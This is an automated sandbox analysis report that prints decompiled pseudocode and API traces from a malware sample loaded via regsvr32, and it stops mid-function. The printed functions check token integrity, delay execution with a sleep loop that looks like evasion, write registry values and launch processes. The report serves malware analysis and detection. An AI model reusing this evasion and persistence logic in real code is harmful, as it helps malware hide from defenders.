Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: ca4bb3aaa4314abf408fe42c514e3e2f15b5999391c98f250a5350dba4d376bf
Instruction ID: 2331d121f1a8ab42c2c0f5e12b82d4caeb3417ac5a7f0a0f801d5455106b39ba
Opcode Fuzzy Hash: ca4bb3aaa4314abf408fe42c514e3e2f15b5999391c98f250a5350dba4d376bf
Instruction Fuzzy Hash: 1451E171E00619ABDB21EB66DC85BEE73F9AB04B10F180115E904E7251DB7DDD40BFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB113D, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00FB113D(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xfba2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00FB6837(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00FB50CA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00fb114a
0x00fb1151
0x00fb1158
0x00fb116c
0x00fb1177
0x00fb118f
0x00fb119c
0x00fb119f
0x00fb11a4
0x00fb11af
0x00fb11b3
0x00fb11c2
0x00fb11c6
0x00fb11e2
0x00fb11e2
0x00fb11e6
0x00fb11e6
0x00fb11eb
0x00fb11ef
0x00fb11f5
0x00fb11f6
0x00fb11fd
0x00fb1203

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00FB116F
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00FB118F
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00FB119F
CloseHandle.KERNEL32(00000000), ref: 00FB11EF

Part of subcall function 00FB6837: RtlAllocateHeap.NTDLL(00000000,00000000,00FB4197), ref: 00FB6843

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00FB11C2
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00FB11CA
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00FB11DA

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 904c80a715dd11cc77bdf78cf4dfea89a4cb57a3b6be0885bb6650eca533731c
Instruction ID: 542233f2023dfc0c6677a1401d36ce0b99195dafc375896613ff6255989c1f37
Opcode Fuzzy Hash: 904c80a715dd11cc77bdf78cf4dfea89a4cb57a3b6be0885bb6650eca533731c
Instruction Fuzzy Hash: C4213975D0020DFFEB00AFA5CC84EEEBBB8FB08354F404065E600A2261C7718A04EF60

Uniqueness

Uniqueness Score: -1.00%

Function 00FB6B0F, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00FB6B0F(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0xfba290 = _t14;
				if(_t14 != 0) {
					 *0xfba180 = GetTickCount();
					_t16 = E00FB4C1B(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L00FB7EEA();
						_t40 = _t18 + _t20;
						_t22 = E00FB414A(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0xfba2ac; // 0x2e0
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0xfba2b8 = 1; // executed
						}
					}
					_t16 = E00FB53F2(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x00fb6b0f
0x00fb6b24
0x00fb6b2c
0x00fb6b31
0x00fb6b44
0x00fb6b49
0x00fb6b50
0x00fb6bd8
0x00fb6bde
0x00000000
0x00000000
0x00000000
0x00fb6b56
0x00fb6b56
0x00fb6b5b
0x00fb6b61
0x00fb6b67
0x00fb6b71
0x00fb6b75
0x00fb6b76
0x00fb6b7b
0x00fb6b7c
0x00fb6b7d
0x00fb6b82
0x00fb6b88
0x00fb6b91
0x00fb6b97
0x00fb6b9d
0x00fb6ba2
0x00fb6ba9
0x00fb6bad
0x00fb6bb5
0x00fb6bbd
0x00fb6bbf
0x00fb6bbf
0x00fb6bc7
0x00fb6bc9
0x00fb6bc9
0x00fb6bc7
0x00fb6bd3
0x00000000
0x00fb6bd3
0x00fb6b35
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00FB6B24
GetTickCount.KERNEL32 ref: 00FB6B3B
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00FB6B5B
SwitchToThread.KERNEL32(?,00000001), ref: 00FB6B61
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00FB6B7D
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00FB6B97
IsWow64Process.KERNEL32(000002E0,?,?,00000001), ref: 00FB6BB5

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: bb2fe41d3d4beab13d7bf9ae06415b47e08b32058d8a92813715f9d8d2a9f518
Instruction ID: c3c00947e452d0b04670669e1230e9257d643b2c32d70591cebd6c8e02c2102b
Opcode Fuzzy Hash: bb2fe41d3d4beab13d7bf9ae06415b47e08b32058d8a92813715f9d8d2a9f518
Instruction Fuzzy Hash: FD21BBB2A08318AFD710AF76DCC9A9A77E8E784360F008A2DF545C6151E779DC44AF61

Uniqueness

Uniqueness Score: -1.00%

Function 00FB624D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00FB624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xfba2d4; // 0x477d5a8
				_t1 = _t9 + 0xfbb60c; // 0x253d7325
				_t36 = 0;
				_t28 = E00FB278C(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x5739631
					_t40 = E00FB6837(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E00FB49FE(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E00FB50CA(_t40);
						_t42 = E00FB7565(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00FB50CA(_t36);
							_t36 = _t42;
						}
						_t43 = E00FB52E5(_t36, _t33);
						if(_t43 != 0) {
							E00FB50CA(_t36);
							_t36 = _t43;
						}
					}
					E00FB50CA(_t28);
				}
				return _t36;
			}

0x00fb624d
0x00fb6250
0x00fb6251
0x00fb6258
0x00fb625f
0x00fb6266
0x00fb626a
0x00fb6271
0x00fb6278
0x00fb627d
0x00fb6285
0x00fb628f
0x00fb6293
0x00fb6297
0x00fb629d
0x00fb62a2
0x00fb62ac
0x00fb62b2
0x00fb62b4
0x00fb62cb
0x00fb62cf
0x00fb62d2
0x00fb62d7
0x00fb62d7
0x00fb62e0
0x00fb62e4
0x00fb62e7
0x00fb62ec
0x00fb62ec
0x00fb62e4
0x00fb62ef
0x00fb62f4
0x00fb62fa

APIs

Part of subcall function 00FB278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00FB6266,253D7325,00000000,00000000,?,00000000,00FB70D9), ref: 00FB27F3
Part of subcall function 00FB278C: sprintf.NTDLL ref: 00FB2814

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00FB70D9,00000000,05739630), ref: 00FB6278
lstrlen.KERNEL32(00000000,?,00000000,00FB70D9,00000000,05739630), ref: 00FB6280

Part of subcall function 00FB6837: RtlAllocateHeap.NTDLL(00000000,00000000,00FB4197), ref: 00FB6843

strcpy.NTDLL ref: 00FB6297
lstrcat.KERNEL32(00000000,00000000), ref: 00FB62A2

Part of subcall function 00FB49FE: lstrlen.KERNEL32(00000000,00000000,00FB70D9,00000000,?,00FB62B1,00000000,00FB70D9,?,00000000,00FB70D9,00000000,05739630), ref: 00FB4A0F

Part of subcall function 00FB50CA: RtlFreeHeap.NTDLL(00000000,00000000,00FB4239,00000000,00000001,?,00000000,?,?,?,00FB6B8D,00000000,?,00000001), ref: 00FB50D6

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FB70D9,?,00000000,00FB70D9,00000000,05739630), ref: 00FB62BF

Part of subcall function 00FB7565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00FB62CB,00000000,?,00000000,00FB70D9,00000000,05739630), ref: 00FB756F
Part of subcall function 00FB7565: _snprintf.NTDLL ref: 00FB75CD

Strings

=, xrefs: 00FB62B9

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 47c7b8e16aa17a9dc550705ca3eb9c8a014262b87b82159751b8c9694e4a82b7
Instruction ID: 864ac45d7812821cedd72d4393125e0351d78777ce897c80ef2938c6825be71b
Opcode Fuzzy Hash: 47c7b8e16aa17a9dc550705ca3eb9c8a014262b87b82159751b8c9694e4a82b7
Instruction Fuzzy Hash: 85119E7390162A778B127BBA8C85DEE36AD9E85B607054119F900E7202DE6CCC02BFE1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB161A, Relevance: 9.2, APIs: 6, Instructions: 152
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(00000000), ref: 00FB165B
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00FB16DD
StrStrIW.SHLWAPI(00000000,006E0069), ref: 00FB171C
SysFreeString.OLEAUT32(00000000), ref: 00FB173E

Part of subcall function 00FB6C6D: SysAllocString.OLEAUT32(00FB92B0), ref: 00FB6CBD

SafeArrayDestroy.OLEAUT32(?), ref: 00FB1792
SysFreeString.OLEAUT32(?), ref: 00FB17A0

Part of subcall function 00FB1FC2: Sleep.KERNELBASE(000001F4), ref: 00FB200A

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 269e127d3e3423953793564850bffbcac0b019ab0d6153f035d0db2e37cf02c4
Instruction ID: 10e6b2dc80b8e8f10d7ac06645f05b0ed416e7d4421537cc95653a0f50548ccf
Opcode Fuzzy Hash: 269e127d3e3423953793564850bffbcac0b019ab0d6153f035d0db2e37cf02c4
Instruction Fuzzy Hash: 9F516176A00209EFCB00DFE9C8948EEB7B6FF88350B648868E505DB220DB35AD45DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2902, Relevance: 9.1, APIs: 6, Instructions: 120
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FB1206: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,057389A0,00FB2932,?,?,?,?,?,?,?,?,?,?,?,00FB2932), ref: 00FB12D2

Part of subcall function 00FB43C0: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00FB43FD
Part of subcall function 00FB43C0: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00FB442E

SysAllocString.OLEAUT32(?), ref: 00FB295E
SysAllocString.OLEAUT32(0070006F), ref: 00FB2972
SysAllocString.OLEAUT32(00000000), ref: 00FB2984
SysFreeString.OLEAUT32(00000000), ref: 00FB29E8
SysFreeString.OLEAUT32(00000000), ref: 00FB29F7
SysFreeString.OLEAUT32(00000000), ref: 00FB2A02

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
String ID:
API String ID: 2831207796-0
Opcode ID: 984e3d20999528b74706d5f1d3bb9a764d0ab7955897766f46e6c7ca2d9ba0b5
Instruction ID: 1928528bc23bcc3812366d351aeac7d13071e565dd5afbbe13470b0386a5e04b
Opcode Fuzzy Hash: 984e3d20999528b74706d5f1d3bb9a764d0ab7955897766f46e6c7ca2d9ba0b5
Instruction Fuzzy Hash: 51315B32D00609AFDB41EFB9C848ADEB7BAAF49311F144425ED14EB120DB75AD06DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1D57, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E00FB1D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0xfba38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00FB4AA6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E00FB7702(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E00FB50CA(_a8);
						goto L29;
					}
					_t64 =  *0xfba2cc; // 0x5739c98
					_t16 = _t64 + 0xc; // 0x5739d8c
					_t65 = E00FB4AA6(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d00fb90, executed
						_t67 = E00FB5F2A(_t97,  *_t33, _t91, _a8,  *0xfba384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0xfba2d4; // 0x477d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0xfbb9e0; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0xfbb9db; // 0x55434b48
								_t69 = _t34;
							}
							if(E00FB5927(_t69,  *0xfba384,  *0xfba388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0xfba2d4; // 0x477d5a8
									_t44 = _t71 + 0xfbb86a; // 0x74666f53
									_t73 = E00FB4AA6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d00fb90
										E00FB1F7A( *_t47, _t91, _a8,  *0xfba388, _a24);
										_t49 = _t101 + 0x10; // 0x3d00fb90
										E00FB1F7A( *_t49, _t91, _t99,  *0xfba380, _a16);
										E00FB50CA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d00fb90
									E00FB1F7A( *_t40, _t91, _a8,  *0xfba388, _a24);
									_t43 = _t101 + 0x10; // 0x3d00fb90
									E00FB1F7A( *_t43, _t91, _a8,  *0xfba380, _a16);
								}
								if( *_t101 != 0) {
									E00FB50CA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d00fb90, executed
					_t81 = E00FB6A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d00fb90
							E00FB5F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00FB50CA(_t100);
						_t98 = _a16;
					}
					E00FB50CA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E00FB77A4(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0xfba38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x00fb1d57
0x00fb1d60
0x00fb1d67
0x00fb1d6c
0x00fb1dd9
0x00fb1ddf
0x00fb1de4
0x00fb1deb
0x00fb1df2
0x00fb1df5
0x00fb1f60
0x00fb1f67
0x00fb1f67
0x00fb1f6c
0x00fb1f6e
0x00fb1f6e
0x00fb1f77
0x00fb1f77
0x00fb1dfb
0x00fb1e00
0x00fb1e07
0x00fb1f56
0x00fb1f59
0x00000000
0x00fb1f59
0x00fb1e0d
0x00fb1e12
0x00fb1e15
0x00fb1e1c
0x00fb1e1f
0x00fb1e68
0x00fb1e68
0x00fb1e7b
0x00fb1e7e
0x00fb1e85
0x00fb1e8d
0x00fb1e92
0x00fb1e9c
0x00fb1e9c
0x00fb1e94
0x00fb1e94
0x00fb1e94
0x00fb1e94
0x00fb1ebe
0x00fb1ec6
0x00fb1ef4
0x00fb1ef9
0x00fb1f00
0x00fb1f05
0x00fb1f09
0x00fb1f3b
0x00fb1f0b
0x00fb1f18
0x00fb1f1b
0x00fb1f2b
0x00fb1f2e
0x00fb1f34
0x00fb1f34
0x00fb1ec8
0x00fb1ed5
0x00fb1ed8
0x00fb1eea
0x00fb1eed
0x00fb1eed
0x00fb1f45
0x00fb1f51
0x00fb1f47
0x00fb1f4a
0x00fb1f4a
0x00fb1f45
0x00fb1ebe
0x00000000
0x00fb1e85
0x00fb1e2e
0x00fb1e31
0x00fb1e38
0x00fb1e3e
0x00fb1e41
0x00fb1e43
0x00fb1e4f
0x00fb1e52
0x00fb1e52
0x00fb1e58
0x00fb1e5d
0x00fb1e5d
0x00fb1e63
0x00000000
0x00fb1e63
0x00fb1d71
0x00000000
0x00fb1d98
0x00fb1d98
0x00fb1da4
0x00fb1db7
0x00fb1dbd
0x00fb1dc5
0x00000000
0x00fb1dc5

APIs

StrChrA.SHLWAPI(00FB30C2,0000005F,00000000,00000000,00000104), ref: 00FB1D8A
lstrcpy.KERNEL32(?,?), ref: 00FB1DB7

Part of subcall function 00FB4AA6: lstrlen.KERNEL32(?,00000000,05739C98,7742C740,00FB13D0,05739E9D,00FB55DE,00FB55DE,?,00FB55DE,?,63699BC3,E8FA7DD7,00000000), ref: 00FB4AAD
Part of subcall function 00FB4AA6: mbstowcs.NTDLL ref: 00FB4AD6
Part of subcall function 00FB4AA6: memset.NTDLL ref: 00FB4AE8

Part of subcall function 00FB1F7A: lstrlenW.KERNEL32(?,?,?,00FB1F20,3D00FB90,80000002,00FB30C2,00FB4106,74666F53,4D4C4B48,00FB4106,?,3D00FB90,80000002,00FB30C2,?), ref: 00FB1F9F

Part of subcall function 00FB50CA: RtlFreeHeap.NTDLL(00000000,00000000,00FB4239,00000000,00000001,?,00000000,?,?,?,00FB6B8D,00000000,?,00000001), ref: 00FB50D6

lstrcpy.KERNEL32(?,00000000), ref: 00FB1DD9

Strings

(, xrefs: 00FB1E3A
\, xrefs: 00FB1DBD

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: bafd8614b2806068a6dc351da20eb8b368be3935c27be605ecefb8cbb22d8b45
Instruction ID: eb6affbee17c9261d1819d8acfbd02aa81a119c115581e47246b872ba45c516b
Opcode Fuzzy Hash: bafd8614b2806068a6dc351da20eb8b368be3935c27be605ecefb8cbb22d8b45
Instruction Fuzzy Hash: CD51697250020AAFDF21AFA2DC91EEA3BB9FF04350F508554FA1592161D73AE925FF20

Uniqueness

Uniqueness Score: -1.00%

Function 00FB6BE1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E00FB6BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00FB2902(_t29, __edi, __eax); // executed
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0xfba2d4; // 0x477d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0xfbb4c8; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0xfbb8f8; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0xfba100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x00fb6be1
0x00fb6be8
0x00fb6bec
0x00fb6bf1
0x00fb6bf8
0x00fb6bfb
0x00fb6c05
0x00fb6c0a
0x00fb6c16
0x00fb6c1d
0x00fb6c27
0x00fb6c27
0x00fb6c1f
0x00fb6c1f
0x00fb6c1f
0x00fb6c1f
0x00fb6c2d
0x00fb6c30
0x00fb6c38
0x00fb6c3b
0x00fb6c3e
0x00fb6c41
0x00fb6c46
0x00fb6c4f
0x00fb6c5c
0x00fb6c51
0x00fb6c57
0x00fb6c57
0x00fb6c62
0x00fb6c62
0x00fb6c6a

APIs

Part of subcall function 00FB2902: SysAllocString.OLEAUT32(?), ref: 00FB295E
Part of subcall function 00FB2902: SysAllocString.OLEAUT32(0070006F), ref: 00FB2972
Part of subcall function 00FB2902: SysAllocString.OLEAUT32(00000000), ref: 00FB2984
Part of subcall function 00FB2902: SysFreeString.OLEAUT32(00000000), ref: 00FB29E8

memset.NTDLL ref: 00FB6C05
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FB6C41
GetLastError.KERNEL32 ref: 00FB6C51
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FB6C62

Strings

<, xrefs: 00FB6C16

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: 0bd0245defd413fa8aa800d8a6f0bd2c02c3d8df4704eb5fdbbf6c30aa2f961d
Instruction ID: 62f8d9fd426fc28d06985bce873eae6fbe70687488e99ed202f5274689ccb598
Opcode Fuzzy Hash: 0bd0245defd413fa8aa800d8a6f0bd2c02c3d8df4704eb5fdbbf6c30aa2f961d
Instruction Fuzzy Hash: 8011FAB190021CABDB10EFA6DC85BD97BB8EB08395F108416E909E7241D778D544EFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00FB73C3, Relevance: 7.6, APIs: 5, Instructions: 92
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00FB73C3(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t18;
				long _t21;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0xfba2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0xfba2d4; // 0x477d5a8
				_t3 = _t8 + 0xfbb8a2; // 0x61636f4c
				_t25 = 0;
				_t30 = E00FB2DEA(_t3, 1);
				if(_t30 != 0) {
